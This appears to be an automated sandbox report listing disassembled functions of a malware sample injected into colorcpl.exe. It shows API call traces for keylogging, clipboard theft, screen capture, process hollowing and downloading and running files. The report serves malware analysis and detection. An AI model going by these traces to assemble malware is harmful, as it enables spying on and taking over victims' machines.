                                        • GetForegroundWindow.USER32 ref: 04A8949C
                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 04A894A7
                                        • GetKeyboardLayout.USER32(00000000), ref: 04A894AE
                                        • GetKeyState.USER32(00000010), ref: 04A894B8
                                        • GetKeyboardState.USER32(?), ref: 04A894C5
                                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 04A894E1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                        • String ID:
                                        • API String ID: 3566172867-0
                                        • Opcode ID: cd3c9cc5bde17242d785f2f36b7f7e8ae104c97d9a0deadcf51e0bd75d9b74df
                                        • Instruction ID: 0e448fcfabd0b7379b2485705979ee62efd4dd42bfcc9556ecdb9360b9c4534d
                                        • Opcode Fuzzy Hash: cd3c9cc5bde17242d785f2f36b7f7e8ae104c97d9a0deadcf51e0bd75d9b74df
                                        • Instruction Fuzzy Hash: B2111E7690120CABDB10DBE4ED49FDA7BBCEB1C705F100465F605E6180E679AE568BA0
                                        Function 04A94DB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A95C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 04A95C9D
                                          • Part of subcall function 04A95C90: OpenProcessToken.ADVAPI32(00000000), ref: 04A95CA4
                                          • Part of subcall function 04A95C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04A95CB6
                                          • Part of subcall function 04A95C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 04A95CD5
                                          • Part of subcall function 04A95C90: GetLastError.KERNEL32 ref: 04A95CDB
                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 04A94E56
                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 04A94E6B
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A94E72
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                        • String ID: PowrProf.dll$SetSuspendState
                                        • API String ID: 1589313981-1420736420
                                        • Opcode ID: 3f7663d8af2fe500c3fc094c112efd94fc9efe8255b3280fc82fb34738acf2e4
                                        • Instruction ID: 17eb63ef8d7f8bcb9f50a2ac5223aedcb44eba3f5b045dd023710dc398947a10
                                        • Opcode Fuzzy Hash: 3f7663d8af2fe500c3fc094c112efd94fc9efe8255b3280fc82fb34738acf2e4
                                        • Instruction Fuzzy Hash: 352132B1B083056BFE14FBB19A95AFF63DDEF94209F40081DA6525B2C1EE25FC0A8751
                                        Function 04ACF61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,04ACF93B,?,00000000), ref: 04ACF6B5
                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,04ACF93B,?,00000000), ref: 04ACF6DE
                                        • GetACP.KERNEL32(?,?,04ACF93B,?,00000000), ref: 04ACF6F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: 14698026cadb5bb64c9ae7f91d903ebfd5db3be6e2dec4bc4e429fe7ba34eb3a
                                        • Instruction ID: 1079fc38effabd74adf6fc10e8b5930314e750a6cba85091b2a887c070c4b087
                                        • Opcode Fuzzy Hash: 14698026cadb5bb64c9ae7f91d903ebfd5db3be6e2dec4bc4e429fe7ba34eb3a
                                        • Instruction Fuzzy Hash: 6921B632700141AED7708F64C900B97B3ABEB48B54B56842DF95ADB1A4F732FE40C790
                                        Function 04A99493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 04A994A4
                                        • LoadResource.KERNEL32(00000000,?,?,?,04A8DD9E), ref: 04A994B8
                                        • LockResource.KERNEL32(00000000,?,?,?,04A8DD9E), ref: 04A994BF
                                        • SizeofResource.KERNEL32(00000000,?,?,?,04A8DD9E), ref: 04A994CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID: SETTINGS
                                        • API String ID: 3473537107-594951305
                                        • Opcode ID: 03171f78d802fb625ef87561f57625cab2abe675b8169a07dd2d441ebb96b532
                                        • Instruction ID: 0375ffa5122290eadc189311d7ba6d0ca0b2de5405bddae9ba103cbfec141ab8
                                        • Opcode Fuzzy Hash: 03171f78d802fb625ef87561f57625cab2abe675b8169a07dd2d441ebb96b532
                                        • Instruction Fuzzy Hash: FFE09AB6602211FFCB211BA6A85CD177EB9E7E97527048464F6129B211C6399C12DB50
                                        Function 04A887A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 04A887A5
                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 04A8881D
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 04A88846
                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 04A8885D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstH_prologNext
                                        • String ID:
                                        • API String ID: 1157919129-0
                                        • Opcode ID: 2e9758982a5e63ddd5112597c296ffeb0be34ca8c0a423e1410b5e45e7ca437b
                                        • Instruction ID: ba629e17994d0ef509c2a16c971e23c86efc3d903d4af97e1eeef7b05ce470e3
                                        • Opcode Fuzzy Hash: 2e9758982a5e63ddd5112597c296ffeb0be34ca8c0a423e1410b5e45e7ca437b
                                        • Instruction Fuzzy Hash: AA811B729001199BEB15FBA0DE90EEDB7B8EF14258F50426ED416A7190EF34BF4ACB50
                                        Function 04ACF7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04AC5725: GetLastError.KERNEL32(?,00000000,04ABF143,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC5729
                                          • Part of subcall function 04AC5725: _free.LIBCMT ref: 04AC575C
                                          • Part of subcall function 04AC5725: SetLastError.KERNEL32(00000000,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC579D
                                          • Part of subcall function 04AC5725: _abort.LIBCMT ref: 04AC57A3
                                          • Part of subcall function 04AC5725: _free.LIBCMT ref: 04AC5784
                                          • Part of subcall function 04AC5725: SetLastError.KERNEL32(00000000,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC5791
                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 04ACF8FC
                                        • IsValidCodePage.KERNEL32(00000000), ref: 04ACF957
                                        • IsValidLocale.KERNEL32(?,00000001), ref: 04ACF966
                                        • GetLocaleInfoW.KERNEL32(?,00001001,04AC1F7E,00000040,?,04AC209E,00000055,00000000,?,?,00000055,00000000), ref: 04ACF9AE
                                        • GetLocaleInfoW.KERNEL32(?,00001002,04AC1FFE,00000040), ref: 04ACF9CD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                        • String ID:
                                        • API String ID: 745075371-0
                                        • Opcode ID: 470d37d6bf648a3be1082f07d07e12ee2f2d639ba9c5cedae2e39b2dad62f1db
                                        • Instruction ID: 092711dce00fa4e70457cf2badf9660f340227a95e93c61471c880036ae1cfa7
                                        • Opcode Fuzzy Hash: 470d37d6bf648a3be1082f07d07e12ee2f2d639ba9c5cedae2e39b2dad62f1db
                                        • Instruction Fuzzy Hash: 3F517071A01206AFEF50DFA5DC44ABE77BAEF08704F04446DF915EB1D0E771AA408B61
                                        Function 04A87848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 04A8784D
                                        • FindFirstFileW.KERNEL32(00000000,?,04AE32A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04A87906
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04A8792E
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04A8793B
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04A87A51
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                        • String ID:
                                        • API String ID: 1771804793-0
                                        • Opcode ID: ac24f068d1e2a6b476eff8c0b14471ab76989b269c8dafaa81f847de2100deb1
                                        • Instruction ID: 4fd12a591ae08dc948b224c73aebd8cdfae1696ec436f18d73ac5f7b8370347b
                                        • Opcode Fuzzy Hash: ac24f068d1e2a6b476eff8c0b14471ab76989b269c8dafaa81f847de2100deb1
                                        • Instruction Fuzzy Hash: 63515172901208ABEF14FBB0DE959ED7778EF10218F90065DE816A7190EF34BB49CB91
                                        Function 04A863C6 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 04A864D2
                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 04A865B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DownloadExecuteFileShell
                                        • String ID: C:\Windows\SysWOW64\colorcpl.exe$open
                                        • API String ID: 2825088817-1189844230
                                        • Opcode ID: 10024b399ddfcb8b22a7e7591fa9c745cc7141c132aaef19460d43155aa04bc6
                                        • Instruction ID: 33caf5f30827b6986f682870e15ae24a88d6f3521945c1f961891f767719b175
                                        • Opcode Fuzzy Hash: 10024b399ddfcb8b22a7e7591fa9c745cc7141c132aaef19460d43155aa04bc6
                                        • Instruction Fuzzy Hash: 7C61C271B043046BFE18FB748AA49BE77A9EF95618F40091DE952571C4EE30FE0AC792
                                        Function 04A9A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 04A9A861
                                          • Part of subcall function 04A9215F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 04A9216E
                                          • Part of subcall function 04A9215F: RegSetValueExA.KERNEL32(?,04AE4150,00000000,?,00000000,00000000,04AF2200,?,pth_unenc,04A8E23B,04AE4150,3.8.0 Pro), ref: 04A92196
                                          • Part of subcall function 04A9215F: RegCloseKey.ADVAPI32(?,?,pth_unenc,04A8E23B,04AE4150,3.8.0 Pro), ref: 04A921A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateInfoParametersSystemValue
                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                        • API String ID: 4127273184-3576401099
                                        • Opcode ID: 6a90828e675a243985faccbffaa3b536ece18c76e1d19301acc689fbc2540931
                                        • Instruction ID: 0781be049af195855be52267be1853668d8473b20a3a3483804d6e4c82c72c45
                                        • Opcode Fuzzy Hash: 6a90828e675a243985faccbffaa3b536ece18c76e1d19301acc689fbc2540931
                                        • Instruction Fuzzy Hash: 2D11A5B2F8034037FD18353A4D6BB7F28E9A342A50F404199E6122B6D5E4D27E5247C6
                                        Function 04ACEEB8 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04AC5725: GetLastError.KERNEL32(?,00000000,04ABF143,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC5729
                                          • Part of subcall function 04AC5725: _free.LIBCMT ref: 04AC575C
                                          • Part of subcall function 04AC5725: SetLastError.KERNEL32(00000000,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC579D
                                          • Part of subcall function 04AC5725: _abort.LIBCMT ref: 04AC57A3
                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,04AC1F85,?,?,?,?,04AC19DC,?,00000004), ref: 04ACEF9A
                                        • _wcschr.LIBVCRUNTIME ref: 04ACF02A
                                        • _wcschr.LIBVCRUNTIME ref: 04ACF038
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,04AC1F85,00000000,04AC20A5), ref: 04ACF0DB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                        • String ID:
                                        • API String ID: 4212172061-0
                                        • Opcode ID: bf589947b5658070795685a6740256eaa1d2fa1be5485f65debab64c8a008791
                                        • Instruction ID: 4368b11ca85447cb9e78774493d6a6bcaf289bed40f4eca18d3f358fc0b4e35c
                                        • Opcode Fuzzy Hash: bf589947b5658070795685a6740256eaa1d2fa1be5485f65debab64c8a008791
                                        • Instruction Fuzzy Hash: 7B61D275A00206EEFB64AB34CD45AAB73A9EF08714F14446EFA19DB1C1FB74F94087A0
                                        Function 04AB98AC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 04AB99A4
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04AB99AE
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 04AB99BB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 76425d1d9ac14fa0e54439ad54d4c9f24c51a9617039a23d6765d5ee5ac2416d
                                        • Instruction ID: 1b6bd817314e861c3e88ee55be03e41a4bc26e72d229e0f330a09972540a08c9
                                        • Opcode Fuzzy Hash: 76425d1d9ac14fa0e54439ad54d4c9f24c51a9617039a23d6765d5ee5ac2416d
                                        • Instruction Fuzzy Hash: 5131D37590122C9BCB61DF69D9887CDBBB8FF18310F5042EAE41CA7251E734AB858F84
                                        Function 04AC07B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000003,?,04AC078B,00000003,04AEB4F8,0000000C,04AC08E2,00000003,00000002,00000000,?,04AC3648,00000003), ref: 04AC07D6
                                        • TerminateProcess.KERNEL32(00000000,?,04AC078B,00000003,04AEB4F8,0000000C,04AC08E2,00000003,00000002,00000000,?,04AC3648,00000003), ref: 04AC07DD
                                        • ExitProcess.KERNEL32 ref: 04AC07EF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 11c5a76c4fbcf62b3ed2de72e23236d8b514009587be79f8b2ab823dc3d97200
                                        • Instruction ID: 66210a065ef464d54f7ece5e9feb7debfee2e85c61ddd624c91043777be72880
                                        • Opcode Fuzzy Hash: 11c5a76c4fbcf62b3ed2de72e23236d8b514009587be79f8b2ab823dc3d97200
                                        • Instruction Fuzzy Hash: C0E0B67144A508EFCF916FA4DA48A883B69EB54346B004028F8168B621CB39ED43CB80
                                        Function 04A8A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32(00000000), ref: 04A8A65D
                                        • GetClipboardData.USER32(0000000D), ref: 04A8A669
                                        • CloseClipboard.USER32 ref: 04A8A671
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$CloseDataOpen
                                        • String ID:
                                        • API String ID: 2058664381-0
                                        • Opcode ID: 2ccbb8b2f3423b9c261d3a2302a75089d9f9a605b418a11b96cc0c0a03403dda
                                        • Instruction ID: 485fbf8d3ab8df2600772783714dc4f175c06326f7c2d6627c8a266eed0d76d0
                                        • Opcode Fuzzy Hash: 2ccbb8b2f3423b9c261d3a2302a75089d9f9a605b418a11b96cc0c0a03403dda
                                        • Instruction Fuzzy Hash: B6E0C230B46320A7E3207B70E808BDA7765EF24B11F01462EB41E96248EB34AC02CAA0
                                        Function 04AB29DA Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 04AB29F3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FeaturePresentProcessor
                                        • String ID:
                                        • API String ID: 2325560087-0
                                        • Opcode ID: d83abcb3e6de8dc714756c0e4a00ac1d75b0b9724410618588f08e6c10adb586
                                        • Instruction ID: b4fabc66eee75d212ba81a763d4b6c586db3b482256dfdfaf5f338a46233634e
                                        • Opcode Fuzzy Hash: d83abcb3e6de8dc714756c0e4a00ac1d75b0b9724410618588f08e6c10adb586
                                        • Instruction Fuzzy Hash: C6515072D002098FEB24CF6AD48979EBBF8FB58314F1484ABD455EB255D778A901CF90
                                        Function 04AB28FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,04AB262F), ref: 04AB2901
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 7207e9bca2ea2d039812bc0a7959b7de316d90ca5725474dea366a5c277f6801
                                        • Instruction ID: 6e0e1fdd51e889a9b3547fb1d1f7719380b90f9a4a2ffe8151bca6006d55eb34
                                        • Opcode Fuzzy Hash: 7207e9bca2ea2d039812bc0a7959b7de316d90ca5725474dea366a5c277f6801
                                        • Instruction Fuzzy Hash:
                                        Function 0691157A Relevance: .0, Instructions: 21COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b675ef751003dd94a4a5a225bc312582345a8ac16cea9a7d3627edb1bededd63
                                        • Instruction ID: da3c6b400c4980b84c5a636cb7cd93e62de985aa015704e291e5e5992a035947
                                        • Opcode Fuzzy Hash: b675ef751003dd94a4a5a225bc312582345a8ac16cea9a7d3627edb1bededd63
                                        • Instruction Fuzzy Hash: F3E0463280020CBFCF81AF24DD08A483B29EF80253F610024FA068B932CB35D942CB81
                                        Function 04A9642D Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 289libraryloaderthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 04A96474
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A96477
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 04A96488
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9648B
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 04A9649C
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9649F
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 04A964B0
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A964B3
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 04A96555
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 04A9656D
                                        • GetThreadContext.KERNEL32(?,00000000), ref: 04A96583
                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 04A965A9
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04A9662B
                                        • TerminateProcess.KERNEL32(?,00000000), ref: 04A9663F
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 04A9667F
                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 04A96749
                                        • SetThreadContext.KERNEL32(?,00000000), ref: 04A96766
                                        • ResumeThread.KERNEL32(?), ref: 04A96773
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04A9678A
                                        • GetCurrentProcess.KERNEL32(?), ref: 04A96795
                                        • TerminateProcess.KERNEL32(?,00000000), ref: 04A967B0
                                        • GetLastError.KERNEL32 ref: 04A967B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                        • API String ID: 4188446516-108836778
                                        • Opcode ID: bb3fe5e959282fd53278f6ab9bfd0a53d9b05c69b6e05a8fa0196848288fa61f
                                        • Instruction ID: 180992814b4a94c1b3d09bf5e2c766122e75fe2e61d8e5130886c0bf1ab361cb
                                        • Opcode Fuzzy Hash: bb3fe5e959282fd53278f6ab9bfd0a53d9b05c69b6e05a8fa0196848288fa61f
                                        • Instruction Fuzzy Hash: E1A178B0604300AFEB109F65CC85B6BBBE8FF48748F040929F6969A291D778EC05CF65
                                        Function 04A96E7E Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 04A96E98
                                        • CreateCompatibleDC.GDI32(00000000), ref: 04A96EA5
                                          • Part of subcall function 04A972DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 04A9730F
                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 04A96F1B
                                        • DeleteDC.GDI32(00000000), ref: 04A96F32
                                        • DeleteDC.GDI32(00000000), ref: 04A96F35
                                        • DeleteObject.GDI32(00000000), ref: 04A96F38
                                        • SelectObject.GDI32(00000000,00000000), ref: 04A96F59
                                        • DeleteDC.GDI32(00000000), ref: 04A96F6A
                                        • DeleteDC.GDI32(00000000), ref: 04A96F6D
                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 04A96F91
                                        • GetIconInfo.USER32(?,?), ref: 04A96FC5
                                        • DeleteObject.GDI32(?), ref: 04A96FF4
                                        • DeleteObject.GDI32(?), ref: 04A97001
                                        • DrawIcon.USER32(00000000,?,?,?), ref: 04A9700E
                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 04A97026
                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 04A97095
                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 04A97104
                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 04A97128
                                        • DeleteDC.GDI32(?), ref: 04A9713C
                                        • DeleteDC.GDI32(00000000), ref: 04A9713F
                                        • DeleteObject.GDI32(00000000), ref: 04A97142
                                        • GlobalFree.KERNEL32(?), ref: 04A9714D
                                        • DeleteObject.GDI32(00000000), ref: 04A97201
                                        • GlobalFree.KERNEL32(?), ref: 04A97208
                                        • DeleteDC.GDI32(?), ref: 04A97218
                                        • DeleteDC.GDI32(00000000), ref: 04A97223
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                        • String ID: DISPLAY
                                        • API String ID: 479521175-865373369
                                        • Opcode ID: 160e4c6b62fc7c2eef48009c3cd454273054c3ca7f4515dc733bb21aa26120f7
                                        • Instruction ID: 40e94158a45d8ba5dbc93c49758afda4561e8a89d90866413ee374e382fdd58a
                                        • Opcode Fuzzy Hash: 160e4c6b62fc7c2eef48009c3cd454273054c3ca7f4515dc733bb21aa26120f7
                                        • Instruction Fuzzy Hash: 4FB15975505304AFEB24EF64D844B6BBBE9EF88754F04481DF98A97280DB34EE05CB62
                                        Function 04A8BFDE Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 281registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A912B5: TerminateProcess.KERNEL32(00000000,04AF21E8,04A8E2B2), ref: 04A912C5
                                          • Part of subcall function 04A912B5: WaitForSingleObject.KERNEL32(000000FF), ref: 04A912D8
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 04A8C0D6
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 04A8C0E9
                                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 04A8C102
                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 04A8C132
                                          • Part of subcall function 04A8A7F2: TerminateThread.KERNEL32(04A89305,00000000,04AF21E8,04A8BC76,?,04AF2200,pth_unenc,04AF21E8), ref: 04A8A801
